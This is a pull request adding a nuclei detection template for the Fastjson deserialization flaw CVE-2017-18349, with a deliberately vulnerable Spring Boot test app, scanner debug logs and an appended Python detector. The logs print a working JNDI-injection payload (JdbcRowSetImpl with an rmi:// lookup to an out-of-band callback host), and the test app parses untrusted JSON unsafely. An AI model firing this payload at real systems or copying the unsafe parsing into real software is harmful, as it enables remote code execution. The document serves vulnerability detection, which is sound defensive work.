PR
Added CVE-2017-18349 template
projectdiscovery/nuclei-templates#12402

Template / PR Information

Recent Updates

  • Simplified matchers to pass automated validation checks
  • Removed generic response matchers to avoid weak-matcher failures
  • Expanded remediation section with detailed security measures
  • Optimized template structure for better reliability

Template Validation

I’ve validated this template locally?

  • YES
  • NO

Additional Details

Docker Environment for Testing:

Create Dockerfile:

FROM openjdk:8-jdk-alpine
WORKDIR /app
COPY pom.xml .
COPY src ./src
RUN apk add --no-cache maven && \
    mvn clean package -DskipTests && \
    mv target/*.jar app.jar
EXPOSE 8080
CMD ["java", "-Dserver.address=0.0.0.0", "-jar", "app.jar"]

Create pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.example</groupId>
    <artifactId>vulnerable-fastjson</artifactId>
    <version>1.0.0</version>
    <packaging>jar</packaging>
    
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.1.0.RELEASE</version>
    </parent>
    
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
    </dependencies>
    
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

Create src/main/java/VulnerableApp.java:

package com.example;

import com.alibaba.fastjson.JSON;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.*;

@SpringBootApplication
@RestController
public class VulnerableApp {
    public static void main(String[] args) {
        SpringApplication.run(VulnerableApp.class, args);
    }
    
    @PostMapping("/json")
    public String parseJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parse(jsonData);
            return "Parsed: " + obj.toString();
        } catch (Exception e) {
            return "Error: " + e.getMessage();
        }
    }
    
    @PostMapping("/api/json")
    public String parseApiJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parseObject(jsonData);
            return "API Parsed: " + obj.toString();
        } catch (Exception e) {
            return "API Error: " + e.getMessage();
        }
    }
    
    @GetMapping("/")
    public String home() {
        return "Vulnerable Fastjson App Running! CVE-2017-18349";
    }
}

Create src/main/resources/application.properties:

server.address=0.0.0.0
server.port=8080

Build and Run:

docker build -t vulnerable-fastjson .
docker run --rm -p 8080:8080 vulnerable-fastjson

Test Command:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

Debug Output:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
[INF] [CVE-2017-18349] Dumped HTTP request for http://127.0.0.1:8080/json

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 173
Accept: application/json
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}
[DBG] [CVE-2017-18349] Dumped HTTP response http://127.0.0.1:8080/json

HTTP/1.1 200 
Connection: close
Content-Length: 37
Content-Type: application/json;charset=UTF-8
Date: Tue, 17 Jun 2025 18:51:37 GMT

Error: set property error, autoCommit

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

;; ANSWER SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      A       178.128.209.14

;; AUTHORITY SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns1.oast.me.
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN      A       178.128.209.14
ns2.oast.me.    3600    IN      A       178.128.209.14

[CVE-2017-18349] [http] [critical] http://127.0.0.1:8080/json ["185.219.143.11"]

HTTP Request/Response:

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Content-Type: application/json

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 37

Error: set property error, autoCommit

DNS Callback Received:

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
DNS Query: d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me IN A
DNS Response: 178.128.209.14

Claim: /claim #12387

Additional References:

Claim

Total prize pool $50
Total paid $50
Status Approved
Submitted June 17, 2025
Last updated June 17, 2025

Contributors

night

@criminalinfluencer

100%

Sponsors

ProjectDiscovery

@projectdiscovery

$50 paid
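
A defensive check for the request shape shown in the debug output above, added here as an example (it is not part of the PR or the nuclei template): it parses request bodies and flags any object carrying an `@type` key, raising the severity when a sibling string value is a JNDI-style URL such as the `rmi://` `dataSourceName`. The scheme list, severity labels, function names and sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Assumption: URL schemes treated as JNDI-style remote lookups.
JNDI_SCHEMES = {"rmi", "ldap", "ldaps", "iiop", "dns"}
SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*)://", re.I)
# Fallback for bodies strict JSON rejects (e.g. single-quoted keys).
RAW_TYPE_KEY = re.compile(r"""["']?@type["']?\s*:""")


def is_jndi_url(value):
    m = SCHEME.match(value)
    return bool(m) and m.group(1).lower() in JNDI_SCHEMES


def _walk(node, path="$"):
    """Yield (path, class_name, urls) for every object that has an @type key."""
    if isinstance(node, dict):
        # Match on the parsed key, so \u-escaped key names are seen too.
        if "@type" in node:
            urls = [v for v in node.values() if isinstance(v, str) and is_jndi_url(v)]
            yield path, str(node["@type"]), urls
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")


def inspect_body(body):
    """Return findings for one HTTP request body (empty list means clean)."""
    try:
        doc = json.loads(body)
    except ValueError:
        hit = RAW_TYPE_KEY.search(body)
        return [{"path": None, "class": None, "urls": [], "severity": "review"}] if hit else []
    return [{"path": p, "class": c, "urls": u, "severity": "high" if u else "medium"}
            for p, c, u in _walk(doc)]


# Constructed sample bodies; the hostnames are placeholders.
SAMPLE_BODIES = [
    '{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"rmi://callback.example.invalid/obj","autoCommit":true}',
    r'{"user":{"prefs":[{"\u0040type":"com.sun.rowset.JdbcRowSetImpl",'
    r'"dataSourceName":"ldap://callback.example.invalid/x"}]}}',
    '{"type":"order","url":"https://shop.example.invalid/"}',
    "{'@type':'com.sun.rowset.JdbcRowSetImpl'}",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(inspect_body(body))
```
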